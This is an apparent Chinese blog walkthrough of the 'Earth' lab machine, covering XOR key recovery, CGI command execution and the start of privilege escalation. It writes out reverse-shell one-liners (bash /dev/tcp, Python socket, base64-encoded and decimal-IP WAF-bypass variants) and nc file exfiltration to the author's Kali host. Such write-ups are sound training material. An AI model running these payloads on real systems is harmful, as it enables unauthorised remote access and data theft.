<figure class="highlight bash"><figcaption data-lang="bash"><span>看看28、30行</span></figcaption><table><tbody><tr><td data-num="1"></td><td><pre>User-Agent: *</pre></td></tr><tr><td data-num="2"></td><td><pre>Disallow: /*.asp</pre></td></tr><tr><td data-num="3"></td><td><pre>Disallow: /*.aspx</pre></td></tr><tr><td data-num="4"></td><td><pre>Disallow: /*.bat</pre></td></tr><tr><td data-num="5"></td><td><pre>Disallow: /*.c</pre></td></tr><tr><td data-num="6"></td><td><pre>Disallow: /*.cfm</pre></td></tr><tr><td data-num="7"></td><td><pre>Disallow: /*.cgi</pre></td></tr><tr><td data-num="8"></td><td><pre>Disallow: /*.com</pre></td></tr><tr><td data-num="9"></td><td><pre>Disallow: /*.dll</pre></td></tr><tr><td data-num="10"></td><td><pre>Disallow: /*.exe</pre></td></tr><tr><td data-num="11"></td><td><pre>Disallow: /*.htm</pre></td></tr><tr><td data-num="12"></td><td><pre>Disallow: /*.html</pre></td></tr><tr><td data-num="13"></td><td><pre>Disallow: /*.inc</pre></td></tr><tr><td data-num="14"></td><td><pre>Disallow: /*.jhtml</pre></td></tr><tr><td data-num="15"></td><td><pre>Disallow: /*.jsa</pre></td></tr><tr><td data-num="16"></td><td><pre>Disallow: /*.json</pre></td></tr><tr><td data-num="17"></td><td><pre>Disallow: /*.jsp</pre></td></tr><tr><td data-num="18"></td><td><pre>Disallow: /*.log</pre></td></tr><tr><td data-num="19"></td><td><pre>Disallow: /*.mdb</pre></td></tr><tr><td data-num="20"></td><td><pre>Disallow: /*.nsf</pre></td></tr><tr><td data-num="21"></td><td><pre>Disallow: /*.php</pre></td></tr><tr><td data-num="22"></td><td><pre>Disallow: /*.phtml</pre></td></tr><tr><td data-num="23"></td><td><pre>Disallow: /*.pl</pre></td></tr><tr><td data-num="24"></td><td><pre>Disallow: /*.reg</pre></td></tr><tr><td data-num="25"></td><td><pre>Disallow: /*.sh</pre></td></tr><tr><td data-num="26"></td><td><pre>Disallow: /*.shtml</pre></td></tr><tr><td data-num="27"></td><td><pre>Disallow: /*.sql</pre></td></tr><tr class="marked"><td data-num="28"></td><td><pre>Disallow: /*.txt</pre></td></tr><tr><td data-num="29"></td><td><pre>Disallow: /*.xml</pre></td></tr><tr class="marked"><td data-num="30"></td><td><pre>Disallow: /testingnotes.*</pre></td></tr></tbody></table></figure><p>内容很多，最后有一个文件名，挨个试一下后缀，发现 txt 中有内容👇</p>
<p><img loading="lazy" data-src="/images/Earth%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95.assets/image-20240504001554684.webp" alt="image-20240504001554684"></p>
<p><mark>消息量巨大</mark>，XOR 其实就是异或运算：<a target="_blank" rel="noopener external nofollow noreferrer" href="https://blog.csdn.net/roc1010/article/details/103227081">异或 (XOR) 运算加密 - CSDN 博客</a></p>
<blockquote>
<p>明文 XOR key ==&gt; 密文      密文 XOR key ==&gt; 明文</p>
</blockquote>
<p>访问 testdata.txt 得到一串英文，写个脚本试一下能不能试出来 key 是什么。</p>
<p>用第三串 16 进制字符试一下（因为明文很长，密文应该也很长）</p>
<p><img loading="lazy" data-src="/images/Earth%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95.assets/image-20240504134242912.webp" alt="image-20240504134242912"></p>
<figure class="highlight python"><figcaption data-lang="python"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token comment"># 脚本：</span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token keyword">def</span> <span class="token function">find_key</span><span class="token punctuation">(</span>plaintext<span class="token punctuation">,</span> ciphertext_hex<span class="token punctuation">)</span><span class="token punctuation">:</span></pre></td></tr><tr><td data-num="3"></td><td><pre>    ciphertext_bytes <span class="token operator">=</span> <span class="token builtin">bytes</span><span class="token punctuation">.</span>fromhex<span class="token punctuation">(</span>ciphertext_hex<span class="token punctuation">)</span>  <span class="token comment"># 将十六进制字符串转换为字节串</span></pre></td></tr><tr><td data-num="4"></td><td><pre>    key <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token punctuation">]</span></pre></td></tr><tr><td data-num="5"></td><td><pre>    <span class="token keyword">for</span> char_plain<span class="token punctuation">,</span> char_cipher <span class="token keyword">in</span> <span class="token builtin">zip</span><span class="token punctuation">(</span>plaintext<span class="token punctuation">,</span> ciphertext_bytes<span class="token punctuation">)</span><span class="token punctuation">:</span></pre></td></tr><tr><td data-num="6"></td><td><pre>        key_byte <span class="token operator">=</span> <span class="token builtin">ord</span><span class="token punctuation">(</span>char_plain<span class="token punctuation">)</span> <span class="token operator">^</span> char_cipher  <span class="token comment"># 对应位置的字符进行异或运算</span></pre></td></tr><tr><td data-num="7"></td><td><pre>        key<span class="token punctuation">.</span>append<span class="token punctuation">(</span>key_byte<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="8"></td><td><pre>    <span class="token keyword">return</span> <span class="token builtin">bytes</span><span class="token punctuation">(</span>key<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="9"></td><td><pre></pre></td></tr><tr><td data-num="10"></td><td><pre>plaintext <span class="token operator">=</span> <span class="token string">"According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago."</span></pre></td></tr><tr><td data-num="11"></td><td><pre>ciphertext_hex <span class="token operator">=</span> <span class="token string">"2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"</span>  <span class="token comment"># 这里密文是十六进制表示的字符串</span></pre></td></tr><tr><td data-num="12"></td><td><pre>key <span class="token operator">=</span> find_key<span class="token punctuation">(</span>plaintext<span class="token punctuation">,</span> ciphertext_hex<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="13"></td><td><pre><span class="token keyword">print</span><span class="token punctuation">(</span>key<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="14"></td><td><pre></pre></td></tr><tr><td data-num="15"></td><td><pre><span class="token comment"># OUTPUT：</span></pre></td></tr><tr><td data-num="16"></td><td><pre><span class="token string">b'earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat'</span></pre></td></tr></tbody></table></figure><p><code>earthclimatechangebad4humans</code>  重复了 15 次。用明文和其他两串密文尝试了下，key 都是含有字符杂乱无章的乱码（没有不可见字符）。然后用 <code>earthclimatechangebad4humans</code>  作为密钥尝试解密另外两串密文，得到的也还是杂乱的字符串（含有不可见字符），看不出来有什么特殊意义。</p>
<h1 id="白送了一个webshell"><a class="anchor" href="#白送了一个webshell">#</a> 白送了一个 webshell</h1>
<p>不过提示中给了用户名，尝试登录一下。用户名： <code>terra </code> ，密码： <code>earthclimatechangebad4humans</code></p>
<p><img loading="lazy" data-src="/images/Earth%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95.assets/image-20240504011702039.webp" alt="image-20240504011702039"></p>
<p>这里可以运行 CGI 脚本，了解一下什么是 CGI 先。</p>
<blockquote>
<p>CGI 是一种标准的、平台无关的、协议无关的接口，用于将 Web 服务器与 Web 应用程序或脚本连接起来。CGI 允许 Web 服务器调用外部程序来处理客户端请求，并将输出返回给客户端。</p>
</blockquote>
<p>说人话：服务器一个脚本，获取数据处理后返回结果给浏览器。</p>
<ul class="lvl-0">
<li class="lvl-2">
<p>数据从哪来？ENV 环境变量，或者标准输入（STDIN）；</p>
</li>
<li class="lvl-2">
<p>脚本用什么语言？可以是 Python 脚本，PERL 脚本，SHELL 脚本，C 或者 C++ 程序等。</p>
</li>
<li class="lvl-2">
<p>结果怎么返回？输出数据发送到标准输出（STDOUT）。</p>
</li>
</ul>
<p><mark><strong>特别之处：</strong></mark></p>
<ol>
<li class="lvl-3">
<p>数据输入</p>
</li>
</ol>
<p>** 环境变量读取：** 对于 CGI 程序来说，它继承了系统的环境变量。CGI 环境变量在 CGI 程序启动时初始化，在结束时销毁。当一个 CGI 程序不是被 HTTP 服务器调用时，它的环境变量几乎是系统环境变量的复制。当这个 CGI 程序被 HTTP 服务器调用时，它的环境变量就会多了以下关于 HTTP 服务器、客户端、CGI 传输过程等项目。</p>
<p>** 浏览器数据发送：** 获取的是浏览器 url 编码后的原始数据，若要使用则需要 CGI 手动解码调用。</p>
<ol start="2">
<li class="lvl-3">
<p>数据输出</p>
</li>
</ol>
<p>CGI 程序如何将信息处理结果返回给客户端？这实际上是 CGI 格式化输出。</p>
<p>在 CGI 程序中的标准输出 stdout 是经过重定义了的，它并没有在服务器上产生任何的输出内容，而是被重定向到客户浏览器，这与它是由 C，还是 Perl 或 Python 实现无关。</p>
<p>CGI 协议还有一系列规范，详解戳👉知识传送门：<a target="_blank" rel="noopener external nofollow noreferrer" href="https://blog.csdn.net/weixin_39609623/article/details/86312439">WEB 之 CGI----CGI 详解_cgi web-CSDN 博客</a></p>
<p>看完这些应该都能发现这是<span class="spoiler" title="你知道得太多了"> hacker 的最爱</span>了。这个框框直接可以命令执行。</p>
<p><img loading="lazy" data-src="/images/Earth%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95.assets/image-20240504015919921.webp" alt="image-20240504015919921"></p>
<p>直接弹个 shell 到 kali 上，准备后续的提权。</p>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token function">bash</span> <span class="token parameter variable">-i</span> <span class="token operator">&gt;&amp;</span> /dev/tcp/192.168.81.129/9999 <span class="token operator"><span class="token file-descriptor important">0</span>&gt;</span><span class="token file-descriptor important">&amp;1</span>    <span class="token comment">#  CGI 靶机执行弹 shell</span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token function">nc</span> <span class="token parameter variable">-lvvp</span> <span class="token number">9999</span>                                   <span class="token comment"># kali 监听端口</span></pre></td></tr></tbody></table></figure><p><img loading="lazy" data-src="/images/Earth%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95.assets/image-20240504020245279.webp" alt="image-20240504020245279"></p>
<p>我嘞个豆，Forbidden 了……（心理怒喷一万句但是表面怂得一批）。直接弹不行绕一下。</p>
<p>反弹 shell payload 大全：<a target="_blank" rel="noopener external nofollow noreferrer" href="https://www.revshells.com/">Online - Reverse Shell Generator (revshells.com)</a></p>
<p>硬的不行来软的，用脚本弹。前面已经知道了靶机有 python 环境的。</p>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre>python3 <span class="token parameter variable">-c</span> <span class="token string">'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.81.129",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'</span></pre></td></tr></tbody></table></figure><p><span class="spoiler" title="你知道得太多了">淦</span>这里还有个限制，如果是用 hackbar 在 POST 中输入 command，由于网页存在 csrf 的 token 校验，导致 execute 时直接弹出 403Forbidden，而直接在输入框中输入发现有长度 100 的限制。于是也行不通。</p>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre>python <span class="token parameter variable">-c</span> exec<span class="token punctuation">(</span><span class="token string">'YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgxLjEyOS85OTk5IDA+JjE='</span>.decode<span class="token punctuation">(</span><span class="token string">'base64'</span><span class="token punctuation">))</span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token function">bash</span> <span class="token parameter variable">-c</span> <span class="token punctuation">{</span>echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC44MS4xMjkvOTk5OSAwPiYx<span class="token punctuation">}</span><span class="token operator">|</span><span class="token punctuation">{</span>base64,-d<span class="token punctuation">}</span><span class="token operator">|</span><span class="token punctuation">{</span>bash,-i<span class="token punctuation">}</span></pre></td></tr></tbody></table></figure><p>这两个 payload 都正常执行了但是却没有弹 shell 到 kali 上，我猜测这里的 waf 只是正则匹配了 ip 的格式，试一下用进制绕过：</p>
<p>3232256385 ---&gt; 192.168.81.129 的 10 进制。<a target="_blank" rel="noopener external nofollow noreferrer" href="https://www.metools.info/other/ipconvert162.html">IP 地址十六进制、二进制、十进制转换在线工具</a></p>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token function">sudo</span> <span class="token function">bash</span> <span class="token parameter variable">-i</span> <span class="token operator">&gt;&amp;</span> /dev/tcp/3232256385/9999 <span class="token operator"><span class="token file-descriptor important">0</span>&gt;</span><span class="token file-descriptor important">&amp;1</span></pre></td></tr></tbody></table></figure><p>弹是弹到了但是……<span class="spoiler" title="你知道得太多了"> 作者我星星你个 **😠</span></p>
<p><img loading="lazy" data-src="/images/Earth%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95.assets/image-20240505130316045.webp" alt="image-20240505130316045"></p>
<p>应该是 sudo 的问题，没有管理员权限没有填写密码导致 CGI 进程被关闭。</p>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token function">bash</span> <span class="token parameter variable">-i</span> <span class="token operator">&gt;&amp;</span> /dev/tcp/3232256385/9999 <span class="token operator"><span class="token file-descriptor important">0</span>&gt;</span><span class="token file-descriptor important">&amp;1</span></pre></td></tr></tbody></table></figure><p><img loading="lazy" data-src="/images/Earth%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95.assets/image-20240505135912477.webp" alt="image-20240505135912477"></p>
<p>一般反弹的 webshell 都是老弱病残，不支持上下文并且无法运行交互式命令。已知靶机有 python 环境，试一试能不能打开交互式 shell，然后尝试下提权。</p>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre>python <span class="token parameter variable">-c</span> <span class="token string">'import pty; pty.spawn("/bin/bash")'</span></pre></td></tr></tbody></table></figure><p>打开后还是这个终端，并且可以交互。为什么 webshell 直接就是交互式 shell？大概和 CGI 的输入输出流有关系吧（只是猜测）。</p>
<p><img loading="lazy" data-src="/images/Earth%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95.assets/image-20240505150248362.webp" alt="image-20240505150248362"></p>
<p>查看 <code>/etc/passwd</code> ，当前用户是 apache。</p>
<figure class="highlight text"><figcaption data-lang="text"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre>root:x:0:0:root:/root:/bin/bash</pre></td></tr><tr><td data-num="2"></td><td><pre>bin:x:1:1:bin:/bin:/sbin/nologin</pre></td></tr><tr><td data-num="3"></td><td><pre>daemon:x:2:2:daemon:/sbin:/sbin/nologin</pre></td></tr><tr><td data-num="4"></td><td><pre>adm:x:3:4:adm:/var/adm:/sbin/nologin</pre></td></tr><tr><td data-num="5"></td><td><pre>lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin</pre></td></tr><tr><td data-num="6"></td><td><pre>sync:x:5:0:sync:/sbin:/bin/sync</pre></td></tr><tr><td data-num="7"></td><td><pre>shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown</pre></td></tr><tr><td data-num="8"></td><td><pre>halt:x:7:0:halt:/sbin:/sbin/halt</pre></td></tr><tr><td data-num="9"></td><td><pre>mail:x:8:12:mail:/var/spool/mail:/sbin/nologin</pre></td></tr><tr><td data-num="10"></td><td><pre>operator:x:11:0:operator:/root:/sbin/nologin</pre></td></tr><tr><td data-num="11"></td><td><pre>games:x:12:100:games:/usr/games:/sbin/nologin</pre></td></tr><tr><td data-num="12"></td><td><pre>ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin</pre></td></tr><tr><td data-num="13"></td><td><pre>nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin</pre></td></tr><tr><td data-num="14"></td><td><pre>systemd-coredump:x:999:997:systemd Core Dumper:/:/sbin/nologin</pre></td></tr><tr><td data-num="15"></td><td><pre>systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin</pre></td></tr><tr><td data-num="16"></td><td><pre>systemd-oom:x:998:996:systemd Userspace OOM Killer:/:/sbin/nologin</pre></td></tr><tr><td data-num="17"></td><td><pre>systemd-timesync:x:997:995:systemd Time Synchronization:/:/sbin/nologin</pre></td></tr><tr><td data-num="18"></td><td><pre>dbus:x:81:81:System message bus:/:/sbin/nologin</pre></td></tr><tr><td data-num="19"></td><td><pre>polkitd:x:996:994:User for polkitd:/:/sbin/nologin</pre></td></tr><tr><td data-num="20"></td><td><pre>rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin</pre></td></tr><tr><td data-num="21"></td><td><pre>cockpit-ws:x:995:991:User for cockpit web service:/nonexisting:/sbin/nologin</pre></td></tr><tr><td data-num="22"></td><td><pre>cockpit-wsinstance:x:994:990:User for cockpit-ws instances:/nonexisting:/sbin/nologin</pre></td></tr><tr><td data-num="23"></td><td><pre>tss:x:59:59:Account used for TPM access:/dev/null:/sbin/nologin</pre></td></tr><tr><td data-num="24"></td><td><pre>abrt:x:173:173::/etc/abrt:/sbin/nologin</pre></td></tr><tr><td data-num="25"></td><td><pre>setroubleshoot:x:993:989::/var/lib/setroubleshoot:/sbin/nologin</pre></td></tr><tr><td data-num="26"></td><td><pre>rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin</pre></td></tr><tr><td data-num="27"></td><td><pre>sshd:x:74:74:Privilege-separated SSH:/usr/share/empty.sshd:/sbin/nologin</pre></td></tr><tr><td data-num="28"></td><td><pre>dnsmasq:x:992:988:Dnsmasq DHCP and DNS server:/var/lib/dnsmasq:/sbin/nologin</pre></td></tr><tr><td data-num="29"></td><td><pre>chrony:x:991:987::/var/lib/chrony:/sbin/nologin</pre></td></tr><tr><td data-num="30"></td><td><pre>tcpdump:x:72:72::/:/sbin/nologin</pre></td></tr><tr><td data-num="31"></td><td><pre>systemd-network:x:985:985:systemd Network Management:/:/usr/sbin/nologin</pre></td></tr><tr><td data-num="32"></td><td><pre>unbound:x:984:984:Unbound DNS resolver:/etc/unbound:/sbin/nologin</pre></td></tr><tr><td data-num="33"></td><td><pre>clevis:x:983:983:Clevis Decryption Framework unprivileged user:/var/cache/clevis:/usr/sbin/nologin</pre></td></tr><tr><td data-num="34"></td><td><pre>earth:x:1000:1000::/home/earth:/bin/bash</pre></td></tr><tr><td data-num="35"></td><td><pre>apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin</pre></td></tr></tbody></table></figure><p>试下找找 flag：</p>
<p><code>find / -name 'flag*'</code>      ----&gt; 空</p>
<p><code>find / -name 'fla*' </code>        ----&gt; 空</p>
<h1 id="get-earth-shell"><a class="anchor" href="#get-earth-shell">#</a> Get-Earth-Shell</h1>
<p>没找到 flag 就提提权吧</p>
<figure class="highlight bash"><figcaption data-lang="bash"><span>注意第15行</span></figcaption><table><tbody><tr><td data-num="1"></td><td><pre>bash-5.1$ <span class="token function">find</span> / <span class="token parameter variable">-perm</span> <span class="token parameter variable">-u</span><span class="token operator">=</span>s <span class="token operator"><span class="token file-descriptor important">2</span>&gt;</span>/dev/null</pre></td></tr><tr><td data-num="2"></td><td><pre></pre></td></tr><tr><td data-num="3"></td><td><pre>/usr/bin/chage</pre></td></tr><tr><td data-num="4"></td><td><pre>/usr/bin/gpasswd</pre></td></tr><tr><td data-num="5"></td><td><pre>/usr/bin/newgrp</pre></td></tr><tr><td data-num="6"></td><td><pre>/usr/bin/su</pre></td></tr><tr><td data-num="7"></td><td><pre>/usr/bin/mount</pre></td></tr><tr><td data-num="8"></td><td><pre>/usr/bin/umount</pre></td></tr><tr><td data-num="9"></td><td><pre>/usr/bin/pkexec</pre></td></tr><tr><td data-num="10"></td><td><pre>/usr/bin/passwd</pre></td></tr><tr><td data-num="11"></td><td><pre>/usr/bin/chfn</pre></td></tr><tr><td data-num="12"></td><td><pre>/usr/bin/chsh</pre></td></tr><tr><td data-num="13"></td><td><pre>/usr/bin/at</pre></td></tr><tr><td data-num="14"></td><td><pre>/usr/bin/sudo</pre></td></tr><tr class="marked"><td data-num="15"></td><td><pre>/usr/bin/reset_root</pre></td></tr><tr><td data-num="16"></td><td><pre>/usr/sbin/grub2-set-bootflag</pre></td></tr><tr><td data-num="17"></td><td><pre>/usr/sbin/pam_timestamp_check</pre></td></tr><tr><td data-num="18"></td><td><pre>/usr/sbin/unix_chkpwd</pre></td></tr><tr><td data-num="19"></td><td><pre>/usr/sbin/mount.nfs</pre></td></tr><tr><td data-num="20"></td><td><pre>/usr/lib/polkit-1/polkit-agent-helper-1</pre></td></tr></tbody></table></figure><details class="info"><summary>遇到了很多没见过了命令，我都去了解了下：</summary><div>
<ul class="lvl-1">
<li class="lvl-2">
<p><code>chage</code> （change user age information）用于更改用户的账户过期信息。这些信息包括账户的过期日期、密码的最近和最旧更改时间、密码的警告期、密码的宽限期和账户的休眠期。</p>
</li>
<li class="lvl-2">
<p><code>gpasswd</code>  用来管理组，它可以用于添加或删除组中的用户、更改组的密码或更改组的特性。</p>
</li>
<li class="lvl-2">
<p><code>newgrp</code>  用于改变当前用户的登录组，即临时改变用户的默认组。用户需要知道该组的密码，并且只能切换到他们属于的组。</p>
</li>
<li class="lvl-2">
<p><code>mount</code>  命令用于将文件系统挂载到 Linux 系统的目录结构中。挂载后，用户和程序就可以访问文件系统中的文件。</p>
</li>
<li class="lvl-2">
<p><code>umount</code>  用于卸载已经挂载的文件系统。卸载后，文件系统中的文件将不再可访问。</p>
</li>
<li class="lvl-2">
<p><code>pkexec</code>  是 PolicyKit 的一部分，它允许非特权用户以管理员权限执行命令。 <code>pkexec</code>  会提示用户输入其密码，然后以 root 用户的权限运行指定的命令。</p>
</li>
<li class="lvl-2">
<p><code>chsh </code> 用来更换登录系统时使用的 shell。 <code>-l</code>  查看 <code>/etc/shells</code> ， <code>-s</code>  修改当前用户的 shell（实际上就是修改 <code>/etc/shells</code> ），修改后需要重启。</p>
</li>
<li class="lvl-2">
<p><code>at [选项] 时间</code> ，用于安排在指定时间执行后台任务。</p>
</li>
<li class="lvl-2">
<p><code>su</code>  和 <code>sudo</code>  都知道。</p>
</li>
<li class="lvl-2">
<p><code>reset_root</code>  用于重置 root 用户的密码。</p>
</li>
<li class="lvl-2">
<p><code>grub2-set-bootflag</code>  用于设置 grub2 引导标志。</p>
</li>
<li class="lvl-2">
<p><code>unix_chkpwd</code>  用于检查用户密码是否符合系统密码策略。由系统自动调用，用户无需手动执行。</p>
</li>
<li class="lvl-2">
<p><code>mount.nfs [选项] &lt;服务器地址&gt;:&lt;远程路径&gt; &lt;本地路径&gt;</code>  用于挂载 NFS 文件系统。</p>
</li>
<li class="lvl-2">
<p><code>polkit-agent-helper-1</code>  是 Polkit（PolicyKit）框架的一部分，用于向用户显示权限请求对话框并执行权限操作。由系统自动调用。</p>
</li>
</ul>
</div></details>
<p>看到 reset_root 我以为有搞头，但是……</p>
<p><img loading="lazy" data-src="/images/Earth%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95.assets/image-20240505151019452.webp" alt="image-20240505151019452"></p>
<p><strong>检查是否存在重置触发器...<br>
 重置失败，所有触发器都不存在。</strong></p>
<p>在这里卡了几个小时，再求助一下 wp 吧。</p>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token function">nc</span> <span class="token parameter variable">-nlvp</span> <span class="token number">9998</span> <span class="token operator">&gt;</span>reset_root     <span class="token comment"># kali 执行，监听端口 9998，结果写入文件</span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token function">nc</span>  <span class="token number">192.168</span>.81.129 <span class="token number">9998</span> <span class="token operator">&lt;</span> /usr/bin/reset_root   <span class="token comment">#  借助 nc 将 reset_root 文件发到 kali 上</span></pre></td></tr><tr><td data-num="3"></td><td><pre> <span class="token function">chmod</span> +x reset_root   <span class="token comment">#  使用之前需要将 reset_root 赋于执行权限，</span></pre></td></tr></tbody></table></figure><p>然后本地用<strong> strace</strong> 命令调试，原谅我知识浅薄，又学了下什么是 strace。</p>
<details class="primary"><summary>调试工具strace</summary><div>
<p><code>strace</code>  是一个用于跟踪和记录进程系统调用以及信号的工具。它能够监视进程执行期间发生的系统调用，并将这些调用以及它们的参数和返回值输出到标准输出或指定的文件中。 <code>strace</code>  常用于调试程序、分析进程的行为、查找性能问题等。</p>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token function">apt</span> <span class="token function">install</span> <span class="token function">strace</span>     <span class="token comment">#  安装 strace 调试工具</span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token function">strace</span> <span class="token punctuation">[</span>options<span class="token punctuation">]</span> <span class="token builtin class-name">command</span> <span class="token punctuation">[</span>arguments<span class="token punctuation">]</span>   <span class="token comment">#  命令格式  command 是被调试的命令</span></pre></td></tr></tbody></table></figure><table>
<thead>
<tr>
<th>选项</th>
<th>描述</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>-d</code>  或  <code>--debug</code></td>
<td>打印  <code>strace</code>  内部调试信息。</td>
</tr>
<tr>
<td><code>-f</code>  或  <code>--follow</code></td>
<td>跟踪子进程。当结合  <code>-p</code>  使用时，跟踪特定进程的子孙。</td>
</tr>
<tr>
<td><code>-ff</code></td>
<td><code>-f</code>  的持久版本，用于跟踪由 PID 文件指定的 PID。</td>
</tr>
<tr>
<td><code>-F</code></td>
<td>打印文件描述符，而不是命令名称。</td>
</tr>
<tr>
<td><code>-i</code>  或  <code>--trace=all</code></td>
<td>跟踪所有系统调用。</td>
</tr>
<tr>
<td><code>-p PID</code>  或  <code>--pid=PID</code></td>
<td>跟踪指定的进程 ID。</td>
</tr>
<tr>
<td><code>-s STRLEN</code></td>
<td>设置输出中每个行的字符串打印的最大长度。</td>
</tr>
<tr>
<td><code>-t</code>  或  <code>--time</code></td>
<td>在每行输出前加上时间戳。</td>
</tr>
<tr>
<td><code>-tt</code></td>
<td>打印纳秒级的时间戳。</td>
</tr>
<tr>
<td><code>-T</code></td>
<td>显示每个系统调用的时间开销。</td>
</tr>
<tr>
<td><code>-v</code>  或  <code>--verbose</code></td>
<td>显示系统调用的详细信息。</td>
</tr>
<tr>
<td><code>-e TRACEEVENT</code></td>
<td>跟踪特定的系统调用或信号。例如， <code>-e open</code>  将只跟踪  <code>open</code>  调用。</td>
</tr>
</tbody>
</table>
<p><code>-e</code>  参数可以接受以下几种类型的类别作为参数：</p>
<ul class="lvl-1">
<li class="lvl-2">
<p><code>trace</code> ：系统调用。</p>
</li>
<li class="lvl-2">
<p><code>signal</code> ：信号。</p>
</li>
<li class="lvl-2">
<p><code>process</code> ：进程事件。</p>
</li>
<li class="lvl-2">
<p><code>exec</code> ：exec 事件。</p>
</li>
<li class="lvl-2">
<p><code>read</code> 、 <code>write</code> 、 <code>socket</code>  等：特定类型的系统调用。</p>
</li>
</ul>
<p>Come from 🤖GPT</p>
</div></details>
<p><img loading="lazy" data-src="/images/Earth%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95.assets/image-20240505184945177.webp" alt="image-20240505184945177"></p>
<figure class="highlight bash"><figcaption data-lang="bash"><span>Problems</span></figcaption><table><tbody><tr><td data-num="1"></td><td><pre>access<span class="token punctuation">(</span><span class="token string">"/dev/shm/kHgTFI5G"</span>, F_OK<span class="token punctuation">)</span>       <span class="token operator">=</span> <span class="token parameter variable">-1</span> ENOENT <span class="token punctuation">(</span>没有那个文件或目录<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="2"></td><td><pre>access<span class="token punctuation">(</span><span class="token string">"/dev/shm/Zw7bV9U5"</span>, F_OK<span class="token punctuation">)</span>       <span class="token operator">=</span> <span class="token parameter variable">-1</span> ENOENT <span class="token punctuation">(</span>没有那个文件或目录<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="3"></td><td><pre>access<span class="token punctuation">(</span><span class="token string">"/tmp/kcM0Wewe"</span>, F_OK<span class="token punctuation">)</span>           <span class="token operator">=</span> <span class="token parameter variable">-1</span> ENOENT <span class="token punctuation">(</span>没有那个文件或目录<span class="token punctuation">)</span></pre></td></tr></tbody></table></figure><p>问题就在这里了，然后就是非常简单粗暴的 —— 创建这三个文件。</p>
